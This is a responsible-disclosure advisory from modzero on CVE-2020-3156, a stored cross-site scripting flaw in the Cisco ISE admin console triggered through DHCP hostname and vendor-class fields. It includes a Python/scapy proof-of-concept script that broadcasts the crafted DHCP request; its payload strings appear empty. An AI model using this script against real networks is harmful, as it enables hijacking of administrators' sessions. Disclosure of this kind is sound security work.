----------------------------------------------------[MZ-19-03]----v1.2-- modzero Security Advisory: Unauthenticated persistent cross-site scripting injection into the administrative console of CISCO ISE web application via DHCP request ------------------------------------------------------------------------ ------------------------------------------------------------------------ 1. Timeline ------------------------------------------------------------------------ * 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com * 2019-11-22: PSIRT opened case (PSIRT-0535851956) * 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19' * 2020-02-12: PSIRT incident manager confirmed reproduceability * 2020-02-12: Received an unofficial CVE Number CVE-2020-3156 * 2020-02-19: modzero released advisory to the public In accordance with modzero's disclosure policy, the advisory is expected to be published not later than February 21st, 2020. Our disclosure policy is available at: https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf ------------------------------------------------------------------------ 2. About ------------------------------------------------------------------------ Affected vendor: Cisco Latest known to be vulnerable version products: * Cisco Identity Services Engine version 2.6.0.156, Patch 2,3 - Product Identifier: SNS-3655-K9 - Version Identifier A0 - ADE-OS Version 3.0.5.144 The Cisco Identity Services Engine is the engine behind Cisco's Network Access Control solution. It enables the creation and enforcement of security and access policies for endpoint devices connected to the company's routers and switches. ------------------------------------------------------------------------ 3. Details ------------------------------------------------------------------------ An unauthenticated attacker who is able to inject a specially crafted DHCP request packet into the network controlled by Cisco Identify Service Engine (ISE), is able to persistently store code (e. g. JavaScript), which is executed in the context of the Web-browser accessing the Web-based management interface. The vulnerability is due to insufficient validation and encoding of the attacker-controllable input within the hostname and vendor class identifier field of processed DHCP request packets. The attacker-controlled code will be executed in the context of the user of the Web-based management console. If a legitimate user is reviewing an Endpoint's attributes within the Identity Services Engine's Web- based-management-interface. The attacker-controlled code will be executed in the context of the user that is currently logged in to the Web-based management console, when the endpoint attribute details are reviewed by opening the following URL: https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails ------------------------------------------------------------------------ 4. Impact ------------------------------------------------------------------------ The code will be executed with the rights of the user accessing the Web- based management console. If the user has administrative rights, the attacker might be able to leverage arbitrary functions of the Web-based management interface. ------------------------------------------------------------------------ 5. Proof of Concept exploit ------------------------------------------------------------------------ Using the following python script, two simple JavaScript code fragments will be sent in the hostname and vendor class identifier fields of the DHCP request. #!/usr/bin/env python from scapy.all import * import scapy conf.iface = "eth0" hostname_payload = "" vendor_class_id_payload = "" _, hw = get_if_raw_hwaddr(conf.iface) ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw, type=0x800) ip = IP(src ='0.0.0.0', dst='255.255.255.255') udp = UDP (sport=68, dport=67) bootp = BOOTP(op=1, chaddr=hw) dhcp = DHCP(options=[("message-type","request"), \ ("hostname",hostname_payload),("vendor_class_id", \ vendor_class_id_payload),('end')]) packet = ethernet / ip / udp / bootp / dhcp sendp(packet, iface=conf.iface) Once a person reviews the attributes of an endpoint within the ISE web- based management interface the code will be executed. ------------------------------------------------------------------------ 6. Workaround ------------------------------------------------------------------------ - ------------------------------------------------------------------------ 7. Fix ------------------------------------------------------------------------ No software updates are available yet. ------------------------------------------------------------------------ 8. Credits ------------------------------------------------------------------------ * Max Moser * Katharina Maennle ------------------------------------------------------------------------ 9. About modzero ------------------------------------------------------------------------ The independent company modzero assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. Website: https://www.modzero.ch E-Mail: contact@modzero.ch ------------------------------------------------------------------------ 10. Disclaimer ------------------------------------------------------------------------ The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.